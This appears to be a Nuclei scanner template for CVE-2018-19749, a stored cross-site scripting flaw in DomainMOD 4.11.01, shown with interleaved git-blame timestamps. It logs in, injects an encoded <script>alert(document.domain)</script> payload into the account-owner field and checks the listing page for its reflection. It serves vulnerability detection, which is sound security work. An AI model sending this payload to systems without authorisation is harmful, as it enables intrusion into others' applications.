2022-07-07 19:59:18 +00:00
|
|
|
id: CVE-2018-19749
|
2022-08-22 07:17:05 +00:00
|
|
|
|
2022-07-07 19:59:18 +00:00
|
|
|
info:
|
2022-07-14 10:19:53 +00:00
|
|
|
name: DomainMOD 4.11.01 - Cross-Site Scripting
|
|
|
|
author: arafatansari
|
|
|
|
severity: medium
|
|
|
|
description: |
|
2022-09-08 13:28:46 +00:00
|
|
|
DomainMOD 4.11.01 contains a cross-site scripting vulnerability via assets/add/account-owner.php Owner name field.
|
2023-09-06 12:57:14 +00:00
|
|
|
remediation: |
|
|
|
|
Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability.
|
2022-07-15 18:33:08 +00:00
|
|
|
reference:
|
|
|
|
- https://github.com/domainmod/domainmod/issues/81
|
2022-07-14 10:19:53 +00:00
|
|
|
- https://www.exploit-db.com/exploits/45941/
|
2022-09-08 13:28:46 +00:00
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2018-19749
|
2022-07-15 18:33:08 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
|
|
|
|
cvss-score: 4.8
|
|
|
|
cve-id: CVE-2018-19749
|
|
|
|
cwe-id: CWE-79
|
2023-10-14 11:27:55 +00:00
|
|
|
epss-score: 0.0011
|
2023-10-19 10:38:59 +00:00
|
|
|
epss-percentile: 0.43736
|
2023-09-06 12:57:14 +00:00
|
|
|
cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:*
|
2022-07-14 10:19:53 +00:00
|
|
|
metadata:
|
2023-06-04 08:13:42 +00:00
|
|
|
verified: true
|
2023-09-06 12:57:14 +00:00
|
|
|
max-request: 3
|
2023-07-11 19:49:27 +00:00
|
|
|
vendor: domainmod
|
|
|
|
product: domainmod
|
2022-08-27 04:41:18 +00:00
|
|
|
tags: cve,cve2018,domainmod,xss,authenticated,edb
|
2022-07-07 19:59:18 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2022-07-14 10:19:53 +00:00
|
|
|
- raw:
|
|
|
|
- |
|
|
|
|
POST / HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
|
|
|
|
new_username={{username}}&new_password={{password}}
|
|
|
|
- |
|
|
|
|
POST /assets/add/account-owner.php HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
|
|
|
|
new_owner=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_notes=
|
|
|
|
- |
|
|
|
|
GET /assets/account-owners.php HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
|
|
|
|
cookie-reuse: true
|
2023-07-11 19:49:27 +00:00
|
|
|
req-condition: true
|
2022-10-07 21:27:25 +00:00
|
|
|
host-redirects: true
|
2022-07-14 10:19:53 +00:00
|
|
|
max-redirects: 2
|
|
|
|
matchers:
|
2022-07-15 11:32:07 +00:00
|
|
|
- type: dsl
|
|
|
|
dsl:
|
|
|
|
- 'status_code_3 == 200'
|
2023-06-19 21:10:30 +00:00
|
|
|
- 'contains(header_3, "text/html")'
|
2022-07-15 11:32:07 +00:00
|
|
|
- "contains(body_3, '><script>alert(document.domain)</script></a>')"
|
2022-07-15 11:35:02 +00:00
|
|
|
condition: and
|
2023-10-20 11:41:13 +00:00
|
|
|
|
|
|
|
# digest: 4a0a0047304502206fc803ec3073dae9c05be3a46fba91d9be310a3fbd58d4d3dfffe0d389260b68022100f20327f32a6b52c6d6321a39854343ccd7a3c7e47e20d4cbfc5f19ff8d2ce5cb:922c64590222798bb761d5b6d8e72950
|